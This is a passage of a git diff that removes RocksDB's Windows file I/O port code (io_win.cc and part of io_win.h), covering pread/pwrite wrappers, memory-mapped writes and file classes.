-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "port/win/io_win.h"
-
-#include "monitoring/iostats_context_imp.h"
-#include "util/aligned_buffer.h"
-#include "util/coding.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-namespace port {
-
-/*
-* DirectIOHelper
-*/
-namespace {
-
-const size_t kSectorSize = 512;
-
-inline
-bool IsPowerOfTwo(const size_t alignment) {
-  return ((alignment) & (alignment - 1)) == 0;
-}
-
-inline
-bool IsSectorAligned(const size_t off) { 
-  return (off & (kSectorSize - 1)) == 0;
-}
-
-inline
-bool IsAligned(size_t alignment, const void* ptr) {
-  return ((uintptr_t(ptr)) & (alignment - 1)) == 0;
-}
-}
-
-
-std::string GetWindowsErrSz(DWORD err) {
-  LPSTR lpMsgBuf;
-  FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM |
-    FORMAT_MESSAGE_IGNORE_INSERTS,
-    NULL, err,
-    0,  // Default language
-    reinterpret_cast<LPSTR>(&lpMsgBuf), 0, NULL);
-
-  std::string Err = lpMsgBuf;
-  LocalFree(lpMsgBuf);
-  return Err;
-}
-
-// We preserve the original name of this interface to denote the original idea
-// behind it.
-// All reads happen by a specified offset and pwrite interface does not change
-// the position of the file pointer. Judging from the man page and errno it does
-// execute
-// lseek atomically to return the position of the file back where it was.
-// WriteFile() does not
-// have this capability. Therefore, for both pread and pwrite the pointer is
-// advanced to the next position
-// which is fine for writes because they are (should be) sequential.
-// Because all the reads/writes happen by the specified offset, the caller in
-// theory should not
-// rely on the current file offset.
-SSIZE_T pwrite(HANDLE hFile, const char* src, size_t numBytes,
-  uint64_t offset) {
-  assert(numBytes <= std::numeric_limits<DWORD>::max());
-  OVERLAPPED overlapped = { 0 };
-  ULARGE_INTEGER offsetUnion;
-  offsetUnion.QuadPart = offset;
-
-  overlapped.Offset = offsetUnion.LowPart;
-  overlapped.OffsetHigh = offsetUnion.HighPart;
-
-  SSIZE_T result = 0;
-
-  unsigned long bytesWritten = 0;
-
-  if (FALSE == WriteFile(hFile, src, static_cast<DWORD>(numBytes), &bytesWritten,
-    &overlapped)) {
-    result = -1;
-  } else {
-    result = bytesWritten;
-  }
-
-  return result;
-}
-
-// See comments for pwrite above
-SSIZE_T pread(HANDLE hFile, char* src, size_t numBytes, uint64_t offset) {
-  assert(numBytes <= std::numeric_limits<DWORD>::max());
-  OVERLAPPED overlapped = { 0 };
-  ULARGE_INTEGER offsetUnion;
-  offsetUnion.QuadPart = offset;
-
-  overlapped.Offset = offsetUnion.LowPart;
-  overlapped.OffsetHigh = offsetUnion.HighPart;
-
-  SSIZE_T result = 0;
-
-  unsigned long bytesRead = 0;
-
-  if (FALSE == ReadFile(hFile, src, static_cast<DWORD>(numBytes), &bytesRead,
-    &overlapped)) {
-    return -1;
-  } else {
-    result = bytesRead;
-  }
-
-  return result;
-}
-
-// SetFileInformationByHandle() is capable of fast pre-allocates.
-// However, this does not change the file end position unless the file is
-// truncated and the pre-allocated space is not considered filled with zeros.
-Status fallocate(const std::string& filename, HANDLE hFile,
-  uint64_t to_size) {
-  Status status;
-
-  FILE_ALLOCATION_INFO alloc_info;
-  alloc_info.AllocationSize.QuadPart = to_size;
-
-  if (!SetFileInformationByHandle(hFile, FileAllocationInfo, &alloc_info,
-    sizeof(FILE_ALLOCATION_INFO))) {
-    auto lastError = GetLastError();
-    status = IOErrorFromWindowsError(
-      "Failed to pre-allocate space: " + filename, lastError);
-  }
-
-  return status;
-}
-
-Status ftruncate(const std::string& filename, HANDLE hFile,
-  uint64_t toSize) {
-  Status status;
-
-  FILE_END_OF_FILE_INFO end_of_file;
-  end_of_file.EndOfFile.QuadPart = toSize;
-
-  if (!SetFileInformationByHandle(hFile, FileEndOfFileInfo, &end_of_file,
-    sizeof(FILE_END_OF_FILE_INFO))) {
-    auto lastError = GetLastError();
-    status = IOErrorFromWindowsError("Failed to Set end of file: " + filename,
-      lastError);
-  }
-
-  return status;
-}
-
-size_t GetUniqueIdFromFile(HANDLE hFile, char* id, size_t max_size) {
-
-  if (max_size < kMaxVarint64Length * 3) {
-    return 0;
-  }
-
-  // This function has to be re-worked for cases when
-  // ReFS file system introduced on Windows Server 2012 is used
-  BY_HANDLE_FILE_INFORMATION FileInfo;
-
-  BOOL result = GetFileInformationByHandle(hFile, &FileInfo);
-
-  TEST_SYNC_POINT_CALLBACK("GetUniqueIdFromFile:FS_IOC_GETVERSION", &result);
-
-  if (!result) {
-    return 0;
-  }
-
-  char* rid = id;
-  rid = EncodeVarint64(rid, uint64_t(FileInfo.dwVolumeSerialNumber));
-  rid = EncodeVarint64(rid, uint64_t(FileInfo.nFileIndexHigh));
-  rid = EncodeVarint64(rid, uint64_t(FileInfo.nFileIndexLow));
-
-  assert(rid >= id);
-  return static_cast<size_t>(rid - id);
-}
-
-////////////////////////////////////////////////////////////////////////////////////////////////////
-// WinMmapReadableFile
-
-WinMmapReadableFile::WinMmapReadableFile(const std::string& fileName,
-                                         HANDLE hFile, HANDLE hMap,
-                                         const void* mapped_region,
-                                         size_t length)
-    : WinFileData(fileName, hFile, false /* use_direct_io */),
-      hMap_(hMap),
-      mapped_region_(mapped_region),
-      length_(length) {}
-
-WinMmapReadableFile::~WinMmapReadableFile() {
-  BOOL ret = ::UnmapViewOfFile(mapped_region_);
-  (void)ret;
-  assert(ret);
-
-  ret = ::CloseHandle(hMap_);
-  assert(ret);
-}
-
-Status WinMmapReadableFile::Read(uint64_t offset, size_t n, Slice* result,
-  char* scratch) const {
-  Status s;
-
-  if (offset > length_) {
-    *result = Slice();
-    return IOError(filename_, EINVAL);
-  } else if (offset + n > length_) {
-    n = length_ - offset;
-  }
-  *result =
-    Slice(reinterpret_cast<const char*>(mapped_region_)+offset, n);
-  return s;
-}
-
-Status WinMmapReadableFile::InvalidateCache(size_t offset, size_t length) {
-  return Status::OK();
-}
-
-size_t WinMmapReadableFile::GetUniqueId(char* id, size_t max_size) const {
-  return GetUniqueIdFromFile(hFile_, id, max_size);
-}
-
-///////////////////////////////////////////////////////////////////////////////
-/// WinMmapFile
-
-
-// Can only truncate or reserve to a sector size aligned if
-// used on files that are opened with Unbuffered I/O
-Status WinMmapFile::TruncateFile(uint64_t toSize) {
-  return ftruncate(filename_, hFile_, toSize);
-}
-
-Status WinMmapFile::UnmapCurrentRegion() {
-  Status status;
-
-  if (mapped_begin_ != nullptr) {
-    if (!::UnmapViewOfFile(mapped_begin_)) {
-      status = IOErrorFromWindowsError(
-        "Failed to unmap file view: " + filename_, GetLastError());
-    }
-
-    // Move on to the next portion of the file
-    file_offset_ += view_size_;
-
-    // UnmapView automatically sends data to disk but not the metadata
-    // which is good and provides some equivalent of fdatasync() on Linux
-    // therefore, we donot need separate flag for metadata
-    mapped_begin_ = nullptr;
-    mapped_end_ = nullptr;
-    dst_ = nullptr;
-
-    last_sync_ = nullptr;
-    pending_sync_ = false;
-  }
-
-  return status;
-}
-
-Status WinMmapFile::MapNewRegion() {
-
-  Status status;
-
-  assert(mapped_begin_ == nullptr);
-
-  size_t minDiskSize = file_offset_ + view_size_;
-
-  if (minDiskSize > reserved_size_) {
-    status = Allocate(file_offset_, view_size_);
-    if (!status.ok()) {
-      return status;
-    }
-  }
-
-  // Need to remap
-  if (hMap_ == NULL || reserved_size_ > mapping_size_) {
-
-    if (hMap_ != NULL) {
-      // Unmap the previous one
-      BOOL ret = ::CloseHandle(hMap_);
-      assert(ret);
-      hMap_ = NULL;
-    }
-
-    ULARGE_INTEGER mappingSize;
-    mappingSize.QuadPart = reserved_size_;
-
-    hMap_ = CreateFileMappingA(
-      hFile_,
-      NULL,                  // Security attributes
-      PAGE_READWRITE,        // There is not a write only mode for mapping
-      mappingSize.HighPart,  // Enable mapping the whole file but the actual
-      // amount mapped is determined by MapViewOfFile
-      mappingSize.LowPart,
-      NULL);  // Mapping name
-
-    if (NULL == hMap_) {
-      return IOErrorFromWindowsError(
-        "WindowsMmapFile failed to create file mapping for: " + filename_,
-        GetLastError());
-    }
-
-    mapping_size_ = reserved_size_;
-  }
-
-  ULARGE_INTEGER offset;
-  offset.QuadPart = file_offset_;
-
-  // View must begin at the granularity aligned offset
-  mapped_begin_ = reinterpret_cast<char*>(
-    MapViewOfFileEx(hMap_, FILE_MAP_WRITE, offset.HighPart, offset.LowPart,
-    view_size_, NULL));
-
-  if (!mapped_begin_) {
-    status = IOErrorFromWindowsError(
-      "WindowsMmapFile failed to map file view: " + filename_,
-      GetLastError());
-  } else {
-    mapped_end_ = mapped_begin_ + view_size_;
-    dst_ = mapped_begin_;
-    last_sync_ = mapped_begin_;
-    pending_sync_ = false;
-  }
-  return status;
-}
-
-Status WinMmapFile::PreallocateInternal(uint64_t spaceToReserve) {
-  return fallocate(filename_, hFile_, spaceToReserve);
-}
-
-WinMmapFile::WinMmapFile(const std::string& fname, HANDLE hFile, size_t page_size,
-  size_t allocation_granularity, const EnvOptions& options)
-  : WinFileData(fname, hFile, false),
-  hMap_(NULL),
-  page_size_(page_size),
-  allocation_granularity_(allocation_granularity),
-  reserved_size_(0),
-  mapping_size_(0),
-  view_size_(0),
-  mapped_begin_(nullptr),
-  mapped_end_(nullptr),
-  dst_(nullptr),
-  last_sync_(nullptr),
-  file_offset_(0),
-  pending_sync_(false) {
-  // Allocation granularity must be obtained from GetSystemInfo() and must be
-  // a power of two.
-  assert(allocation_granularity > 0);
-  assert((allocation_granularity & (allocation_granularity - 1)) == 0);
-
-  assert(page_size > 0);
-  assert((page_size & (page_size - 1)) == 0);
-
-  // Only for memory mapped writes
-  assert(options.use_mmap_writes);
-
-  // View size must be both the multiple of allocation_granularity AND the
-  // page size and the granularity is usually a multiple of a page size.
-  const size_t viewSize = 32 * 1024; // 32Kb similar to the Windows File Cache in buffered mode
-  view_size_ = Roundup(viewSize, allocation_granularity_);
-}
-
-WinMmapFile::~WinMmapFile() {
-  if (hFile_) {
-    this->Close();
-  }
-}
-
-Status WinMmapFile::Append(const Slice& data) {
-  const char* src = data.data();
-  size_t left = data.size();
-
-  while (left > 0) {
-    assert(mapped_begin_ <= dst_);
-    size_t avail = mapped_end_ - dst_;
-
-    if (avail == 0) {
-      Status s = UnmapCurrentRegion();
-      if (s.ok()) {
-        s = MapNewRegion();
-      }
-
-      if (!s.ok()) {
-        return s;
-      }
-    } else {
-      size_t n = std::min(left, avail);
-      memcpy(dst_, src, n);
-      dst_ += n;
-      src += n;
-      left -= n;
-      pending_sync_ = true;
-    }
-  }
-
-  // Now make sure that the last partial page is padded with zeros if needed
-  size_t bytesToPad = Roundup(size_t(dst_), page_size_) - size_t(dst_);
-  if (bytesToPad > 0) {
-    memset(dst_, 0, bytesToPad);
-  }
-
-  return Status::OK();
-}
-
-// Means Close() will properly take care of truncate
-// and it does not need any additional information
-Status WinMmapFile::Truncate(uint64_t size) {
-  return Status::OK();
-}
-
-Status WinMmapFile::Close() {
-  Status s;
-
-  assert(NULL != hFile_);
-
-  // We truncate to the precise size so no
-  // uninitialized data at the end. SetEndOfFile
-  // which we use does not write zeros and it is good.
-  uint64_t targetSize = GetFileSize();
-
-  if (mapped_begin_ != nullptr) {
-    // Sync before unmapping to make sure everything
-    // is on disk and there is not a lazy writing
-    // so we are deterministic with the tests
-    Sync();
-    s = UnmapCurrentRegion();
-  }
-
-  if (NULL != hMap_) {
-    BOOL ret = ::CloseHandle(hMap_);
-    if (!ret && s.ok()) {
-      auto lastError = GetLastError();
-      s = IOErrorFromWindowsError(
-        "Failed to Close mapping for file: " + filename_, lastError);
-    }
-
-    hMap_ = NULL;
-  }
-
-  if (hFile_ != NULL) {
-
-    TruncateFile(targetSize);
-
-    BOOL ret = ::CloseHandle(hFile_);
-    hFile_ = NULL;
-
-    if (!ret && s.ok()) {
-      auto lastError = GetLastError();
-      s = IOErrorFromWindowsError(
-        "Failed to close file map handle: " + filename_, lastError);
-    }
-  }
-
-  return s;
-}
-
-Status WinMmapFile::Flush() { return Status::OK(); }
-
-// Flush only data
-Status WinMmapFile::Sync() {
-  Status s;
-
-  // Some writes occurred since last sync
-  if (dst_ > last_sync_) {
-    assert(mapped_begin_);
-    assert(dst_);
-    assert(dst_ > mapped_begin_);
-    assert(dst_ < mapped_end_);
-
-    size_t page_begin =
-      TruncateToPageBoundary(page_size_, last_sync_ - mapped_begin_);
-    size_t page_end =
-      TruncateToPageBoundary(page_size_, dst_ - mapped_begin_ - 1);
-
-    // Flush only the amount of that is a multiple of pages
-    if (!::FlushViewOfFile(mapped_begin_ + page_begin,
-      (page_end - page_begin) + page_size_)) {
-      s = IOErrorFromWindowsError("Failed to FlushViewOfFile: " + filename_,
-        GetLastError());
-    } else {
-      last_sync_ = dst_;
-    }
-  }
-
-  return s;
-}
-
-/**
-* Flush data as well as metadata to stable storage.
-*/
-Status WinMmapFile::Fsync() {
-  Status s = Sync();
-
-  // Flush metadata
-  if (s.ok() && pending_sync_) {
-    if (!::FlushFileBuffers(hFile_)) {
-      s = IOErrorFromWindowsError("Failed to FlushFileBuffers: " + filename_,
-        GetLastError());
-    }
-    pending_sync_ = false;
-  }
-
-  return s;
-}
-
-/**
-* Get the size of valid data in the file. This will not match the
-* size that is returned from the filesystem because we use mmap
-* to extend file by map_size every time.
-*/
-uint64_t WinMmapFile::GetFileSize() {
-  size_t used = dst_ - mapped_begin_;
-  return file_offset_ + used;
-}
-
-Status WinMmapFile::InvalidateCache(size_t offset, size_t length) {
-  return Status::OK();
-}
-
-Status WinMmapFile::Allocate(uint64_t offset, uint64_t len) {
-  Status status;
-  TEST_KILL_RANDOM("WinMmapFile::Allocate", rocksdb_kill_odds);
-
-  // Make sure that we reserve an aligned amount of space
-  // since the reservation block size is driven outside so we want
-  // to check if we are ok with reservation here
-  size_t spaceToReserve = Roundup(offset + len, view_size_);
-  // Nothing to do
-  if (spaceToReserve <= reserved_size_) {
-    return status;
-  }
-
-  IOSTATS_TIMER_GUARD(allocate_nanos);
-  status = PreallocateInternal(spaceToReserve);
-  if (status.ok()) {
-    reserved_size_ = spaceToReserve;
-  }
-  return status;
-}
-
-size_t WinMmapFile::GetUniqueId(char* id, size_t max_size) const {
-  return GetUniqueIdFromFile(hFile_, id, max_size);
-}
-
-//////////////////////////////////////////////////////////////////////////////////
-// WinSequentialFile
-
-WinSequentialFile::WinSequentialFile(const std::string& fname, HANDLE f,
-                                     const EnvOptions& options)
-    : WinFileData(fname, f, options.use_direct_reads) {}
-
-WinSequentialFile::~WinSequentialFile() {
-  assert(hFile_ != INVALID_HANDLE_VALUE);
-}
-
-Status WinSequentialFile::Read(size_t n, Slice* result, char* scratch) {
-  assert(result != nullptr && !WinFileData::use_direct_io());
-  Status s;
-  size_t r = 0;
-
-  // Windows ReadFile API accepts a DWORD.
-  // While it is possible to read in a loop if n is > UINT_MAX
-  // it is a highly unlikely case.
-  if (n > UINT_MAX) {
-    return IOErrorFromWindowsError(filename_, ERROR_INVALID_PARAMETER);
-  }
-
-  DWORD bytesToRead = static_cast<DWORD>(n); //cast is safe due to the check above
-  DWORD bytesRead = 0;
-  BOOL ret = ReadFile(hFile_, scratch, bytesToRead, &bytesRead, NULL);
-  if (ret == TRUE) {
-    r = bytesRead;
-  } else {
-    return IOErrorFromWindowsError(filename_, GetLastError());
-  }
-
-  *result = Slice(scratch, r);
-
-  return s;
-}
-
-SSIZE_T WinSequentialFile::PositionedReadInternal(char* src, size_t numBytes,
-  uint64_t offset) const {
-  return pread(GetFileHandle(), src, numBytes, offset);
-}
-
-Status WinSequentialFile::PositionedRead(uint64_t offset, size_t n, Slice* result,
-  char* scratch) {
-
-  Status s;
-
-  assert(WinFileData::use_direct_io());
-
-  // Windows ReadFile API accepts a DWORD.
-  // While it is possible to read in a loop if n is > UINT_MAX
-  // it is a highly unlikely case.
-  if (n > UINT_MAX) {
-    return IOErrorFromWindowsError(GetName(), ERROR_INVALID_PARAMETER);
-  }
-
-  auto r = PositionedReadInternal(scratch, n, offset);
-
-  if (r < 0) {
-    auto lastError = GetLastError();
-    // Posix impl wants to treat reads from beyond
-    // of the file as OK.
-    if (lastError != ERROR_HANDLE_EOF) {
-      s = IOErrorFromWindowsError(GetName(), lastError);
-    }
-  }
-
-  *result = Slice(scratch, (r < 0) ? 0 : size_t(r));
-  return s;
-}
-
-
-Status WinSequentialFile::Skip(uint64_t n) {
-  // Can't handle more than signed max as SetFilePointerEx accepts a signed 64-bit
-  // integer. As such it is a highly unlikley case to have n so large.
-  if (n > _I64_MAX) {
-    return IOErrorFromWindowsError(filename_, ERROR_INVALID_PARAMETER);
-  }
-
-  LARGE_INTEGER li;
-  li.QuadPart = static_cast<int64_t>(n); //cast is safe due to the check above
-  BOOL ret = SetFilePointerEx(hFile_, li, NULL, FILE_CURRENT);
-  if (ret == FALSE) {
-    return IOErrorFromWindowsError(filename_, GetLastError());
-  }
-  return Status::OK();
-}
-
-Status WinSequentialFile::InvalidateCache(size_t offset, size_t length) {
-  return Status::OK();
-}
-
-//////////////////////////////////////////////////////////////////////////////////////////////////
-/// WinRandomAccessBase
-
-inline
-SSIZE_T WinRandomAccessImpl::PositionedReadInternal(char* src,
-  size_t numBytes,
-  uint64_t offset) const {
-  return pread(file_base_->GetFileHandle(), src, numBytes, offset);
-}
-
-inline
-WinRandomAccessImpl::WinRandomAccessImpl(WinFileData* file_base,
-  size_t alignment,
-  const EnvOptions& options) :
-    file_base_(file_base),
-    alignment_(alignment) {
-
-  assert(!options.use_mmap_reads);
-}
-
-inline
-Status WinRandomAccessImpl::ReadImpl(uint64_t offset, size_t n, Slice* result,
-  char* scratch) const {
-
-  Status s;
-
-  // Check buffer alignment
-  if (file_base_->use_direct_io()) {
-    if (!IsAligned(alignment_, scratch)) {
-      return Status::InvalidArgument("WinRandomAccessImpl::ReadImpl: scratch is not properly aligned");
-    }
-  }
-
-  if (n == 0) {
-    *result = Slice(scratch, 0);
-    return s;
-  }
-
-  size_t left = n;
-  char* dest = scratch;
-
-  SSIZE_T r = PositionedReadInternal(scratch, left, offset);
-  if (r > 0) {
-    left -= r;
-  } else if (r < 0) {
-    auto lastError = GetLastError();
-    // Posix impl wants to treat reads from beyond
-    // of the file as OK.
-    if(lastError != ERROR_HANDLE_EOF) {
-      s = IOErrorFromWindowsError(file_base_->GetName(), lastError);
-    }
-  }
-
-  *result = Slice(scratch, (r < 0) ? 0 : n - left);
-
-  return s;
-}
-
-///////////////////////////////////////////////////////////////////////////////////////////////////
-/// WinRandomAccessFile
-
-WinRandomAccessFile::WinRandomAccessFile(const std::string& fname, HANDLE hFile,
-                                         size_t alignment,
-                                         const EnvOptions& options)
-    : WinFileData(fname, hFile, options.use_direct_reads),
-      WinRandomAccessImpl(this, alignment, options) {}
-
-WinRandomAccessFile::~WinRandomAccessFile() {
-}
-
-Status WinRandomAccessFile::Read(uint64_t offset, size_t n, Slice* result,
-  char* scratch) const {
-  return ReadImpl(offset, n, result, scratch);
-}
-
-Status WinRandomAccessFile::InvalidateCache(size_t offset, size_t length) {
-  return Status::OK();
-}
-
-size_t WinRandomAccessFile::GetUniqueId(char* id, size_t max_size) const {
-  return GetUniqueIdFromFile(GetFileHandle(), id, max_size);
-}
-
-size_t WinRandomAccessFile::GetRequiredBufferAlignment() const {
-  return GetAlignment();
-}
-
-/////////////////////////////////////////////////////////////////////////////
-// WinWritableImpl
-//
-
-inline
-Status WinWritableImpl::PreallocateInternal(uint64_t spaceToReserve) {
-  return fallocate(file_data_->GetName(), file_data_->GetFileHandle(), spaceToReserve);
-}
-
-inline
-WinWritableImpl::WinWritableImpl(WinFileData* file_data, size_t alignment)
-  : file_data_(file_data),
-  alignment_(alignment),
-  next_write_offset_(0),
-  reservedsize_(0) {
-
-  // Query current position in case ReopenWritableFile is called
-  // This position is only important for buffered writes
-  // for unbuffered writes we explicitely specify the position.
-  LARGE_INTEGER zero_move;
-  zero_move.QuadPart = 0; // Do not move
-  LARGE_INTEGER pos;
-  pos.QuadPart = 0;
-  BOOL ret = SetFilePointerEx(file_data_->GetFileHandle(), zero_move, &pos,
-      FILE_CURRENT);
-  // Querying no supped to fail
-  if (ret) {
-    next_write_offset_ = pos.QuadPart;
-  } else {
-    assert(false);
-  }
-}
-
-inline
-Status WinWritableImpl::AppendImpl(const Slice& data) {
-
-  Status s;
-
-  assert(data.size() < std::numeric_limits<DWORD>::max());
-
-  uint64_t written = 0;
-  (void)written;
-
-  if (file_data_->use_direct_io()) {
-
-    // With no offset specified we are appending
-    // to the end of the file
-
-    assert(IsSectorAligned(next_write_offset_));
-    assert(IsSectorAligned(data.size()));
-    assert(IsAligned(GetAlignement(), data.data()));
-
-    SSIZE_T ret = pwrite(file_data_->GetFileHandle(), data.data(),
-     data.size(), next_write_offset_);
-
-    if (ret < 0) {
-      auto lastError = GetLastError();
-      s = IOErrorFromWindowsError(
-        "Failed to pwrite for: " + file_data_->GetName(), lastError);
-    }
-    else {
-      written = ret;
-    }
-
-  } else {
-
-    DWORD bytesWritten = 0;
-    if (!WriteFile(file_data_->GetFileHandle(), data.data(),
-      static_cast<DWORD>(data.size()), &bytesWritten, NULL)) {
-      auto lastError = GetLastError();
-      s = IOErrorFromWindowsError(
-        "Failed to WriteFile: " + file_data_->GetName(),
-        lastError);
-    }
-    else {
-      written = bytesWritten;
-    }
-  }
-
-  if(s.ok()) {
-    assert(written == data.size());
-    next_write_offset_ += data.size();
-  }
-
-  return s;
-}
-
-inline
-Status WinWritableImpl::PositionedAppendImpl(const Slice& data, uint64_t offset) {
-
-  if(file_data_->use_direct_io()) {
-    assert(IsSectorAligned(offset));
-    assert(IsSectorAligned(data.size()));
-    assert(IsAligned(GetAlignement(), data.data()));
-  }
-
-  Status s;
-
-  SSIZE_T ret = pwrite(file_data_->GetFileHandle(), data.data(), data.size(), offset);
-
-  // Error break
-  if (ret < 0) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError(
-      "Failed to pwrite for: " + file_data_->GetName(), lastError);
-  }
-  else {
-    assert(size_t(ret) == data.size());
-    // For sequential write this would be simple
-    // size extension by data.size()
-    uint64_t write_end = offset + data.size();
-    if (write_end >= next_write_offset_) {
-      next_write_offset_ = write_end;
-    }
-  }
-  return s;
-}
-
-// Need to implement this so the file is truncated correctly
-// when buffered and unbuffered mode
-inline
-Status WinWritableImpl::TruncateImpl(uint64_t size) {
-  Status s = ftruncate(file_data_->GetName(), file_data_->GetFileHandle(),
-    size);
-  if (s.ok()) {
-    next_write_offset_ = size;
-  }
-  return s;
-}
-
-inline
-Status WinWritableImpl::CloseImpl() {
-
-  Status s;
-
-  auto hFile = file_data_->GetFileHandle();
-  assert(INVALID_HANDLE_VALUE != hFile);
-
-  if (fsync(hFile) < 0) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError("fsync failed at Close() for: " +
-      file_data_->GetName(),
-      lastError);
-  }
-
-  if(!file_data_->CloseFile()) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError("CloseHandle failed for: " + file_data_->GetName(),
-      lastError);
-  }
-  return s;
-}
-
-inline
-Status WinWritableImpl::SyncImpl() {
-  Status s;
-  // Calls flush buffers
-  if (fsync(file_data_->GetFileHandle()) < 0) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError(
-        "fsync failed at Sync() for: " + file_data_->GetName(), lastError);
-  }
-  return s;
-}
-
-
-inline
-Status WinWritableImpl::AllocateImpl(uint64_t offset, uint64_t len) {
-  Status status;
-  TEST_KILL_RANDOM("WinWritableFile::Allocate", rocksdb_kill_odds);
-
-  // Make sure that we reserve an aligned amount of space
-  // since the reservation block size is driven outside so we want
-  // to check if we are ok with reservation here
-  size_t spaceToReserve = Roundup(offset + len, alignment_);
-  // Nothing to do
-  if (spaceToReserve <= reservedsize_) {
-    return status;
-  }
-
-  IOSTATS_TIMER_GUARD(allocate_nanos);
-  status = PreallocateInternal(spaceToReserve);
-  if (status.ok()) {
-    reservedsize_ = spaceToReserve;
-  }
-  return status;
-}
-
-
-////////////////////////////////////////////////////////////////////////////////
-/// WinWritableFile
-
-WinWritableFile::WinWritableFile(const std::string& fname, HANDLE hFile,
-                                 size_t alignment, size_t /* capacity */,
-                                 const EnvOptions& options)
-    : WinFileData(fname, hFile, options.use_direct_writes),
-      WinWritableImpl(this, alignment) {
-  assert(!options.use_mmap_writes);
-}
-
-WinWritableFile::~WinWritableFile() {
-}
-
-// Indicates if the class makes use of direct I/O
-bool WinWritableFile::use_direct_io() const { return WinFileData::use_direct_io(); }
-
-size_t WinWritableFile::GetRequiredBufferAlignment() const {
-  return GetAlignement();
-}
-
-Status WinWritableFile::Append(const Slice& data) {
-  return AppendImpl(data);
-}
-
-Status WinWritableFile::PositionedAppend(const Slice& data, uint64_t offset) {
-  return PositionedAppendImpl(data, offset);
-}
-
-// Need to implement this so the file is truncated correctly
-// when buffered and unbuffered mode
-Status WinWritableFile::Truncate(uint64_t size) {
-  return TruncateImpl(size);
-}
-
-Status WinWritableFile::Close() {
-  return CloseImpl();
-}
-
-  // write out the cached data to the OS cache
-  // This is now taken care of the WritableFileWriter
-Status WinWritableFile::Flush() {
-  return Status::OK();
-}
-
-Status WinWritableFile::Sync() {
-  return SyncImpl();
-}
-
-Status WinWritableFile::Fsync() { return SyncImpl(); }
-
-uint64_t WinWritableFile::GetFileSize() {
-  return GetFileNextWriteOffset();
-}
-
-Status WinWritableFile::Allocate(uint64_t offset, uint64_t len) {
-  return AllocateImpl(offset, len);
-}
-
-size_t WinWritableFile::GetUniqueId(char* id, size_t max_size) const {
-  return GetUniqueIdFromFile(GetFileHandle(), id, max_size);
-}
-
-/////////////////////////////////////////////////////////////////////////
-/// WinRandomRWFile
-
-WinRandomRWFile::WinRandomRWFile(const std::string& fname, HANDLE hFile,
-                                 size_t alignment, const EnvOptions& options)
-    : WinFileData(fname, hFile,
-                  options.use_direct_reads && options.use_direct_writes),
-      WinRandomAccessImpl(this, alignment, options),
-      WinWritableImpl(this, alignment) {}
-
-bool WinRandomRWFile::use_direct_io() const { return WinFileData::use_direct_io(); }
-
-size_t WinRandomRWFile::GetRequiredBufferAlignment() const {
-  return GetAlignement();
-}
-
-Status WinRandomRWFile::Write(uint64_t offset, const Slice & data) {
-  return PositionedAppendImpl(data, offset);
-}
-
-Status WinRandomRWFile::Read(uint64_t offset, size_t n, Slice* result,
-                             char* scratch) const {
-  return ReadImpl(offset, n, result, scratch);
-}
-
-Status WinRandomRWFile::Flush() {
-  return Status::OK();
-}
-
-Status WinRandomRWFile::Sync() {
-  return SyncImpl();
-}
-
-Status WinRandomRWFile::Close() {
-  return CloseImpl();
-}
-
-//////////////////////////////////////////////////////////////////////////
-/// WinDirectory
-
-Status WinDirectory::Fsync() { return Status::OK(); }
-
-//////////////////////////////////////////////////////////////////////////
-/// WinFileLock
-
-WinFileLock::~WinFileLock() {
-  BOOL ret = ::CloseHandle(hFile_);
-  assert(ret);
-}
-
-}
-}
diff --git a/thirdparty/rocksdb/port/win/io_win.h b/thirdparty/rocksdb/port/win/io_win.h
deleted file mode 100644
index 2c1d5a1..0000000
--- a/thirdparty/rocksdb/port/win/io_win.h
+++ /dev/null
@@ -1,441 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <stdint.h>
-#include <mutex>
-#include <string>
-
-#include "rocksdb/status.h"
-#include "rocksdb/env.h"
-#include "util/aligned_buffer.h"
-
-#include <windows.h>
-
-
-namespace rocksdb {
-namespace port {
-
-std::string GetWindowsErrSz(DWORD err);
-
-inline Status IOErrorFromWindowsError(const std::string& context, DWORD err) {
-  return ((err == ERROR_HANDLE_DISK_FULL) || (err == ERROR_DISK_FULL))
-             ? Status::NoSpace(context, GetWindowsErrSz(err))
-             : Status::IOError(context, GetWindowsErrSz(err));
-}
-
-inline Status IOErrorFromLastWindowsError(const std::string& context) {
-  return IOErrorFromWindowsError(context, GetLastError());
-}
-
-inline Status IOError(const std::string& context, int err_number) {
-  return (err_number == ENOSPC)
-             ? Status::NoSpace(context, strerror(err_number))
-             : Status::IOError(context, strerror(err_number));
-}
-
-// Note the below two do not set errno because they are used only here in this
-// file
-// on a Windows handle and, therefore, not necessary. Translating GetLastError()
-// to errno
-// is a sad business
-inline int fsync(HANDLE hFile) {
-  if (!FlushFileBuffers(hFile)) {
-    return -1;
-  }
-
-  return 0;
-}
-
-SSIZE_T pwrite(HANDLE hFile, const char* src, size_t numBytes, uint64_t offset);
-
-SSIZE_T pread(HANDLE hFile, char* src, size_t numBytes, uint64_t offset);
-
-Status fallocate(const std::string& filename, HANDLE hFile, uint64_t to_size);
-
-Status ftruncate(const std::string& filename, HANDLE hFile, uint64_t toSize);
-
-size_t GetUniqueIdFromFile(HANDLE hFile, char* id, size_t max_size);
-
-class WinFileData {
- protected:
-  const std::string filename_;
-  HANDLE hFile_;
-  // If ture,  the I/O issued would be direct I/O which the buffer
-  // will need to be aligned (not sure there is a guarantee that the buffer
-  // passed in is aligned).
-  const bool use_direct_io_;
-
- public:
-  // We want this class be usable both for inheritance (prive
-  // or protected) and for containment so __ctor and __dtor public
-  WinFileData(const std::string& filename, HANDLE hFile, bool direct_io)
-      : filename_(filename), hFile_(hFile), use_direct_io_(direct_io) {}
-
-  virtual ~WinFileData() { this->CloseFile(); }
-
-  bool CloseFile() {
-    bool result = true;
-
-    if (hFile_ != NULL && hFile_ != INVALID_HANDLE_VALUE) {
